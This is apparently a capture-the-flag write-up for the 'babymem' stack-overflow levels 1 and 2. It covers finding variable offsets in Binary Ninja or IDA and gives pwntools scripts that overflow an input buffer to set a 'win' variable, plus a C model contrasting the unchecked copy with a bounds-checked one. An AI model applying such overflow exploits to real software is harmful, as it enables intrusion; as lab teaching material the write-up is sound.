
# babymem

## Notes

### Binary Ninja

Binja High Level IL has its own syntax. It is a C-like language, but you can't assume it is just C. I recommend reading the [documentation](https://docs.binary.ninja/dev/bnil-overview.html#reading-il) to avoid confusion.

### Binary Ninja vs. IDA

The course itself recommends binja, but I recommend IDA, period. You will know why after you work through all the challenges.

### Renaming

A huge part of this chapter is finding offsets of different variables. If you would like to do it the static analysis way, renaming these variables would help a lot.

### Remote vs. Local

If you download the binary to your local machine, the relative offsets inside the binary stay the same. That is, you can use whatever tools you want on your local machine to find those offsets. You don't have to do everything on the remote machine.

## Level 1

### Teaching Level

![Level 1](https://i.imgur.com/7D57n3f.png)

### Solution 1: Binja

To overwrite the `win` variable, first we need to figure out where the input buffer and the `win` variable are located in memory. In binja, I recommend the following workflow:

* **Step 1:** Read **linear high level IL**, find key variables and rename them. In this case, we look for `buffer` and `win`.
* **Step 2:** Switch to **disassembly** and look for renamed variables. Jot down their offsets.

Read the linear high level IL of the `vuln()` function and rename variables:

![Linear High Level IL](https://i.imgur.com/M6BfoAF.png)

Switch to disassembly and look for `buffer` and `win`:

![Disassembly](https://i.imgur.com/fyzx9iZ.png)

### Solution 2: IDA

In IDA, things are even easier. First we name the `win` variable:

![Rename](https://i.imgur.com/X5qYHwY.png)

The offset relative to rbp can be found in the variable declarations:

![Offset](https://i.imgur.com/cEoYwzo.png)

The downside is that IDA does not recognize all the function names, so I still recommend binja for this chapter.

### Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level1_testing1", checksec=False)

#--------ret2win--------#

# Distance from the start of the input buffer to the `win` variable,
# read off the disassembly above (0x20 = 32 bytes).
offset = 0x20

# 32 filler bytes fill the buffer; the 33rd byte lands in `win` and
# makes it non-zero, so we declare a payload size of 33.
payload_size = b"33"
payload = flat(
    b"A" * offset,
    b"B",
)

p = elf.process()

p.sendlineafter(b"Payload size: ", payload_size)
p.sendlineafter(b"Send your payload (up to " + payload_size + b" bytes)!\n", payload)

p.interactive()
```

## Level 2

### Teaching Level

![Level 2](https://i.imgur.com/O88mFj9.png)

### Solution

The offsets are not easy to find for this level. Instead, we just spam enough `A`'s so that the `win` variable on the stack is overwritten.

### Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level2_testing1", checksec=False)

#--------ret2win--------#

# No exact offset needed: 1024 bytes of filler is enough to run past
# the buffer and overwrite `win` with non-zero bytes.
payload_size = b"1024"
payload = flat(
    b"A" * 1024,
)

p = elf.process()

p.sendlineafter(b"Payload size: ", payload_size)
p.sendlineafter(b"Send your payload (up to " + payload_size + b" bytes)!\n", payload)

p.interactive()
```
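The stack layout both levels rely on, as an added C model that is not the challenge's code and not from this writeup: a struct stands in for the frame (an assumption), the unchecked read shows why a declared size of 33 or a 1024-byte spam of `A`'s flips `win`, and the checked read shows the bounds check that closes the hole.

```c
#include <stddef.h>
#include <string.h>

/* Constructed model of the babymem stack frame (an assumption, not the
 * challenge's own code): 0x20 bytes of input buffer followed directly by
 * the `win` variable, matching the level 1 offset. A struct is used so
 * the layout is deterministic and the overflow is plain byte copying into
 * the struct, which is well-defined, unlike writing past a real frame. */
#define BUFFER_SIZE 0x20

struct frame {
    char buffer[BUFFER_SIZE];
    int  win;
};

/* Vulnerable pattern behind both levels: the user-supplied payload
 * size is trusted, so 33 bytes reach one byte past `buffer` and land in
 * `win`, and a 1024-byte spam of 'A's does the same without knowing the
 * exact offset. The cap at sizeof(*f) only keeps this model in bounds;
 * the real binary has no such cap. Returns 1 if `win` was clobbered. */
int read_payload_unchecked(struct frame *f, const char *input, size_t size) {
    if (size > sizeof(*f))
        size = sizeof(*f);
    memcpy((char *)f, input, size);
    return f->win != 0;
}

/* Hardened version: validate the size against the destination buffer
 * before copying, so `win` is unreachable. Returns -1 on rejected input,
 * otherwise whether `win` changed (always 0 here). */
int read_payload_checked(struct frame *f, const char *input, size_t size) {
    if (size > sizeof(f->buffer))
        return -1;
    memcpy(f->buffer, input, size);
    return f->win != 0;
}

/* Build the writeup's payloads: `offset` bytes of 'A', then one 'B' when
 * `with_marker` is set (level 1), or just the 'A's (level 2 spam).
 * Returns the payload length, or 0 if it does not fit in `out`. */
size_t build_payload(char *out, size_t cap, size_t offset, int with_marker) {
    size_t len = offset + (with_marker ? 1 : 0);
    if (len > cap)
        return 0;
    memset(out, 'A', offset);
    if (with_marker)
        out[offset] = 'B';
    return len;
}
```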
